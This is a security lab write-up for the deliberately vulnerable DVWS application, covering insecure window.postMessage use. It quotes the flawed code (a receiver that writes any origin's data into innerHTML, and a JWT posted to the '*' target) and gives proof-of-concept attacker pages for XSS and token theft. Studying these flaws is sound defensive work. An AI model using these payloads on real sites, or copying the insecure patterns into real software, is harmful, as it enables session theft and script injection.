Insecure PostMessage Configuration

Introduction

The window.postMessage method helps solve the Cross-Origin communication challenge by providing a controlled method of communicating between windows in different origins. Security issues can occur in scenarios such as :

• A Page that process data from any origin insecurely, allowing Cross Site Scripting Attacks
• Pages that disclose sensitive information by posting data to the “*” wildcard target, or a target that the attacker can control. Other information disclosure vulnerabilities arise when a page designed to proxy API calls on behalf of another origin do not apply adequate access controls

Details

Within the admin area of the DVWS application, an area exists which will display a user's token back to them.

This functionality is dependant on the following code:

• userdisplay.js - A file which takes a user's JWTSessionID token and sends it to reciever.html
• reciever.js - A file which is embedded within reciever.html which receives data from any origin and will display it using innerHTML

Cross-Site Scripting (XSS) via PostMessage

Since data from any origin is received by receiver.html, An attacker can inject malicious JavaScript which will be displayed back in receiver.html

Example Attacker Code

<!DOCTYPE html>
<html>
<head></head>
<body>
  <p>
    <button class="btn btn-black" id="send">Click Here Victim</button>
 </p>
 <iframe id="receiver" src="http://dvws.local/receiver.html" width="700" height="60">
    <p>Your browser does not support iframes.</p>
 </iframe>
 <script type="text/javascript"> 
  
  window.onload = function() {
  
    var receiver = document.getElementById('receiver').contentWindow;
    var btn = document.getElementById('send');
    function sendMessage(e) {
      e.preventDefault();
      receiver.postMessage("<svg/onload=alert(window.location.href)>", '*');
    }
  
    btn.addEventListener('click', sendMessage);
  }
  </script>

</body>
</html>

Cross-Site Script Inclusion/Information Leakage via Postmessage

The userdisplay.js file loading a user's JWT token and is using Template literals to send it to the receiver page. That code that provides this functionality is below:

var jwt = localStorage.getItem("JWTSessionID");

window.onload = function() {

	var receiver = document.getElementById('receiver').contentWindow;
	var btn = document.getElementById('send');
	function sendMessage(e) {
		e.preventDefault();
		receiver.postMessage(`${jwt}`, '*');
	}

	btn.addEventListener('click', sendMessage);
}

This can be stolen by an attacker by hosting the below attack code and getting a victim to browser their site.

<!DOCTYPE html>

<head>
</head>

<body>
  <script src="/static/userdisplay.js"></script>

  <script>console.log(jwt)</script>
  <p>Exploit</p>
</body>

</html>

References

• https://www.hahwul.com/2016/08/29/web-hacking-html5-postmessage-api/
• https://docs.ioin.in/writeup/www.exploit-db.com/_docs_40287_pdf/index.pdf
• https://ngailong.wordpress.com/2018/02/13/the-mystery-of-postmessage/